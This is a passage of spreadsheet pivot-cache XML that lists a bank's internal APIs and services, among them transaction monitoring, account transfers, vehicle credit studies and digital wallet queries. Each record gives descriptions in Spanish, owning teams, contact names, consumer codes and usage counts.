    <n v="3697353"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-25T22:39:26"/>
    <s v="Transaction"/>
    <n v="301"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="301"/>
    <x v="475"/>
    <s v="La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ AW1333002_Transaction_Monitoreo _x000d__x000a_ AW1333002_Transaction_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-09T01:01:22"/>
    <s v="Transaction"/>
    <n v="100"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="100"/>
    <x v="475"/>
    <s v="La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-22T15:52:28"/>
    <s v="Transaction"/>
    <n v="202"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="201"/>
    <x v="475"/>
    <s v="El API de monitoreo transaccional, permite realizar el rastreo a las transacciones que realiza un cliente en los diferentes canales banco. La prevención  a nivel de financiación es fundamental y un insumo de este rastreo es el comportamiento de nuestros clientes, por esto, por medio de la evaluación de su actividad sabemos si hay algo inusual por lo que debamos general alertas de riesgos, y a su vez poder almacenar la información del estado final de la misma.  La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica, aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas.  Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencia Cuentas Deposito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Transferencia Cuentas Deposito tiene como objetivo realizar transferencia en línea entre cuentas depósitos (Cuenta Ahorro a Cuenta Ahorro y Cuenta Corriente y viceversa)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="AW0638 _x000d__x000a_AW1269001 _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencia Fondos Banco ABanca Digital"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como alcance realizar transferencia de fondos desde una cuenta Bancolombia a una cuenta de Banca Digital ( Nequi)"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle (Banco Digital)_AW1011001"/>
    <s v="SVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio TransferenciasCuentasDepositos habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos según se requiera."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="AW0000852 _x000d__x000a_AW1373 _x000d__x000a_NU0010001 _x000d__x000a_AW1365 _x000d__x000a_AW0000125 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0094001 _x000d__x000a_NU0166001 _x000d__x000a_AW0360006 _x000d__x000a_ISRDI001 _x000d__x000a_AW0955001 _x000d__x000a_AW1435001 _x000d__x000a_AW1300001 _x000d__x000a_AW1404002 _x000d__x000a_AW1277001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias De Bolsillos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio TransferenciasDeBolsillos habilita las capacidades Monetarias sobre los bolsillos de una cuenta de ahorros como, por ejemplo, adicionar a un bolsillo, retirar de un bolsillo o transferir entre bolsillos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias De Fondos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Transferencias de fondos tiene como objetivo realizar transferencia en línea entre cuentas depósitos (Cuenta Ahorro a Cuenta Ahorro y Cuenta Corriente y viceversa) entre cuentas de la filial o cuentas externas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1276001 _x000d__x000a_APIC _x000d__x000a_AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias Otros Bancos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Transferencias Otros Bancos permitirá gestionar las operaciones asociadas a otros bancos a traves del sistema ACH como lo son crear beneficiarios, enviar transferencias a otros bancos y anular transferencias a otros bancos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transmision Contenido Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite realizar contribución o carga    de archivos directamente al Gestor Documental WCC del Banco"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0659"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Trasferencias InvestBot"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Transferencias Investbot, permite hacer transferencias de dinero desde FIC (Fondos de Inversión Colectiva) valores, Cunetas multiproductos Valores y Cuentas de ahorros y corrientes hacia la cuenta de investbot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-10T15:02:05"/>
    <s v="Trust"/>
    <n v="101"/>
    <s v="Trust - Trusts"/>
    <n v="101"/>
    <x v="476"/>
    <s v="Esta API permite consultar la información de los fideicomisos de los clientes que tienen bienes administrados y gestionados por Fiduciaria Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Validacion Cuentas Nequi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá validar con el número de documento y tipo de documento si un cliente tiene cuenta vigente en Nequi."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle (Banco Digital)_AW1011001"/>
    <s v="AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Validar Codigo Seguridad"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir que el usuario valide el código de seguridad que fue generado cuando solicitó la regeneración de la clave."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Validar Cuenta"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir consultar las cuentas tanto de ahorro, corriente y AFC de los clientes para validar, que dicha cuenta exista, que permita que se le apliquen Créditos (Desembolsos), que permita que se le realicen Débitos (Débito Automático), que no esté bloqueada, y que si es una cuenta AFC, de ahorros o corriente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="AW0709001 _x000d__x000a_AW01010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-21T22:12:15"/>
    <s v="Vehicle Credit Study"/>
    <n v="104"/>
    <s v="Vehicle Credit - Final Study"/>
    <n v="104"/>
    <x v="477"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="5247"/>
    <n v="7617"/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:02:55"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit - Final Study"/>
    <n v="106"/>
    <x v="477"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-21T22:12:15"/>
    <s v="Vehicle Credit Study"/>
    <n v="104"/>
    <s v="Vehicle Credit - Manual Study"/>
    <n v="104"/>
    <x v="478"/>
    <s v="API publica que permite registrar la información adicional en que caso de requerirse un estudio manual para el crédito de vehiculo. Esta API se toma como una tercera familia de apis, con tres capacidades que se irán ejecutando secuencialmente. Una vez realizado este registro de datos para el estudio manual, se entrega una respuesta indicando que se realizará el estudio. Esta APIs esta especificada en el contexto funcional de SUFI-Vehiculos."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="4919"/>
    <n v="7610"/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:02:55"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit - Manual Study"/>
    <n v="106"/>
    <x v="478"/>
    <s v="&lt;p&gt;La capacidad expuesta por Grupo Bancolombia tiene como objetivo la radicaci&amp;oacute;n de la informaci&amp;oacute;n necesaria para realizar el estudio de cr&amp;eacute;dito para v&amp;eacute;hiculo con los siguientes pasos del proceso:&lt;/p&gt; &lt;p&gt;Los pasos a seguir en este proceso son:&lt;br /&gt;   &lt;ol&gt;&lt;li&gt;La soluci&amp;oacute;n se debe autenticar en la plataforma de APIs de Bancolombia.&lt;/li&gt;&lt;li&gt;La soluci&amp;oacute;n debe presentar los formularios para la captura de la informaci&amp;oacute;n para la radicaci&amp;oacute;n de la solicitud del cr&amp;eacute;dito, con los datos del comercio si aplica, categorizaci&amp;oacute;n del producto, datos del producto.&lt;/li&gt;&lt;li&gt;Continua con el registro de informaci&amp;oacute;n Personal (realizando la precarga de datos si es cliente Bancolombia por medio de la API de Customers) y financiera, actividad econ&amp;oacute;mica.&lt;/li&gt;&lt;li&gt;Se realiza el env&amp;iacute;o de informaci&amp;oacute;n aceptando terminos y condiciones.&lt;/li&gt;&lt;li&gt;Se realizan la validaciones de Pre-Bureau, Bureau y Pos-Bureau.&lt;/li&gt;&lt;li&gt;Generaci&amp;oacute;n autom&amp;aacute;tica de una aprobaci&amp;oacute;n, rechazo o en su defecto env&amp;iacute;o a estudio manual.&lt;/li&gt; &lt;/ol&gt;"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-21T22:12:15"/>
    <s v="Vehicle Credit Study"/>
    <n v="104"/>
    <s v="Vehicle Credit - Preliminary Study"/>
    <n v="104"/>
    <x v="479"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="4917"/>
    <n v="7617"/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:02:55"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit - Preliminary Study"/>
    <n v="106"/>
    <x v="479"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <n v="62"/>
    <n v="71"/>
    <n v="88"/>
    <n v="49"/>
    <n v="57"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-23T15:34:03"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit Study - Authorization"/>
    <n v="100"/>
    <x v="480"/>
    <s v="Proveedor de OAuth2 para autorización de las APIs de estudio de crédito de vehí­culo"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-12-28T17:51:59"/>
    <s v="Vehicle Loan Sufi"/>
    <n v="100"/>
    <s v="Vehicle Information"/>
    <n v="100"/>
    <x v="481"/>
    <s v="API que ofrece capacidades sobre el vehí­culo para el cual fue aprobado un crédito como la consulta de la información del vehí­culo, el registro, consulta y levantamiento de contrato de prenda en las secretarias de transito de Colombia, de manera que se puedan adelantar cualquier tipo de tramites en lí­nea."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Tramites_Digitales_AW1081001_SUFI_APM _x000d__x000a_ Monitoreo_AW1081001"/>
    <n v="104"/>
    <n v="7159"/>
    <n v="7318"/>
    <n v="6270"/>
    <n v="10197"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Vender Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Soportar la funcionalidad de negociaciones de Divisas realizadas entre el banco y sus clientes."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Murex_MUREX-CORE_AW0434001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Verificacion Codigo Autorizacion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Verificación Código Autorización permite a los consumidores hacer la validación del código de autorización retornado en el proceso de autenticación de un cliente, para garantizar el acceso a diferentes funcionalidades. _x005f_x000D_ Actualmente Implementado en IIB10"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1189001 _x000d__x000a_BIM"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Verificar Producto"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Para el proceso de autogestión que realizan los clientes desde la sucursal virtual (eBanking), se requiere poder verificar en el HUB de Información si un determinado producto pertenece a un cliente."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-09T16:31:42"/>
    <s v="Wallet"/>
    <n v="201"/>
    <s v="Wallet - Transactional Log"/>
    <n v="201"/>
    <x v="482"/>
    <s v="Con esta API se permitirá consultar la información de las novedades aplicadas de los clientes registrados en la Nueva Billetera.   Estas novedades incluyen:   - Registro del cliente en la billetera - Tarjetas del cliente en la billetera  - Tarjetas activas del cliente en la billetera - Tarjetas visibles del cliente en la billetera  - Tarjetas ocultas del cliente en la billetera - Tarjeta seleccionada como favorita por el cliente en la billetera (para pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="23"/>
    <n v="66"/>
    <n v="49"/>
    <n v="9"/>
    <n v="6"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Cards"/>
    <n v="200"/>
    <x v="483"/>
    <s v="Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La bíºsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="12"/>
    <n v="44"/>
    <n v="259"/>
    <n v="205"/>
    <n v="178"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Cards"/>
    <n v="201"/>
    <x v="483"/>
    <s v="Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La bíºsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="12"/>
    <n v="44"/>
    <n v="259"/>
    <n v="205"/>
    <n v="178"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Enrollment"/>
    <n v="200"/>
    <x v="484"/>
    <s v="Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="2"/>
    <n v="24"/>
    <n v="77"/>
    <n v="48"/>
    <n v="73"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Enrollment"/>
    <n v="201"/>
    <x v="484"/>
    <s v="Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="2"/>
    <n v="24"/>
    <n v="77"/>
    <n v="48"/>
    <n v="73"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Enrollment History"/>
    <n v="200"/>
    <x v="485"/>
    <s v="Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="2"/>
    <n v="22"/>
    <n v="207"/>
    <n v="203"/>
    <n v="178"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
